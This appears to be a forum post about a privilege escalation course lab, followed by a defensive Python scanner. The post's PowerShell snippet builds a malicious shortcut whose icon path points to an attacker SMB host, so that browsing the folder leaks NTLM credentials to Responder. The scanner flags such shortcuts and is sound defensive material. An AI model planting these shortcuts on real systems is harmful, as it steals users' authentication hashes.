In the Windows privilege escalation module, section user interaction:
The example payload for the malicious lnk file works only when the shortcut is used by clicking it. In order for it to be triggered when viewed in Explorer, the iconpath needs to be set to the target IP (otherwise this lab's targeted account will not end up at Responder). (I had to set the targetpath to something else, like calc.exe, in order for it to work; I don't know why.)
So the payload should be:
```powershell
$objShell = New-Object -ComObject WScript.Shell
$lnk = $objShell.CreateShortcut("C:\legit.lnk")
$lnk.TargetPath = "calc.exe"
$lnk.WindowStyle = 1
$lnk.IconLocation = "\\<attackerIP>\@pwn.png, 0"
$lnk.Description = "Browsing to the directory where this file is saved will trigger an auth request."
$lnk.HotKey = "Ctrl+Alt+O"
```
Note that this is just for the Windows Server 2016 used in the example. Windows Server 2019 seems to work differently.
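For the defending side of the behaviour described above, here is an added example (not part of the original post or the course material) that reads the IconLocation string out of `.lnk` files and reports the ones that point at a UNC path, without letting Explorer render them. It parses only the StringData section of the shell link format and does not inspect LinkInfo or the extra data blocks; the function names and the `192.0.2.10` sample host are constructed for illustration.

```python
import struct, sys
from pathlib import Path

LINK_CLSID = bytes.fromhex("0114020000000000c000000000000046")
HAS_IDLIST, HAS_LINKINFO, IS_UNICODE = 0x01, 0x02, 0x80
# StringData fields, in file order, with the LinkFlags bit that announces each
STRING_FLAGS = [(0x04, "Name"), (0x08, "RelativePath"), (0x10, "WorkingDir"),
                (0x20, "Arguments"), (0x40, "IconLocation")]

def parse_string_data(data: bytes) -> dict:
    """Return the StringData fields of a shell link; nothing is resolved or loaded."""
    if len(data) < 76 or data[:4] != b"\x4c\x00\x00\x00" or data[4:20] != LINK_CLSID:
        raise ValueError("not a shell link")
    flags = struct.unpack_from("<I", data, 20)[0]
    off, fields = 76, {}
    if flags & HAS_IDLIST:      # 2-byte size, then the ID list itself
        off += 2 + struct.unpack_from("<H", data, off)[0]
    if flags & HAS_LINKINFO:    # 4-byte size that includes the size field
        off += struct.unpack_from("<I", data, off)[0]
    width, codec = (2, "utf-16-le") if flags & IS_UNICODE else (1, "cp1252")
    for bit, name in STRING_FLAGS:
        if flags & bit:
            size = struct.unpack_from("<H", data, off)[0] * width
            raw = data[off + 2:off + 2 + size]
            if len(raw) != size:
                raise ValueError("truncated StringData")
            fields[name] = raw.decode(codec, "replace")
            off += 2 + size
    return fields

def remote_icon(data: bytes):
    """Return the IconLocation if it is a UNC path, else None."""
    icon = parse_string_data(data).get("IconLocation", "")
    p = icon.replace("/", "\\").upper()
    local_device = p.startswith(("\\\\?\\", "\\\\.\\")) and not p.startswith("\\\\?\\UNC\\")
    return icon if p.startswith("\\\\") and not local_device else None

def sample_lnk(icon: str) -> bytes:
    """Constructed fixture: 76-byte header plus one Unicode IconLocation string."""
    header = struct.pack("<I16sI", 0x4C, LINK_CLSID, 0x40 | IS_UNICODE) + bytes(52)
    return header + struct.pack("<H", len(icon)) + icon.encode("utf-16-le")

if __name__ == "__main__":
    for path in Path(sys.argv[1] if len(sys.argv) > 1 else ".").rglob("*.lnk"):
        try:
            hit = remote_icon(path.read_bytes())
        except (ValueError, struct.error, OSError):
            continue
        if hit: print(f"{path}: icon is loaded from {hit}")
```

Run it with a directory as the only argument, for example a writable file share, to list shortcuts whose icon would be fetched over SMB when the folder is browsed.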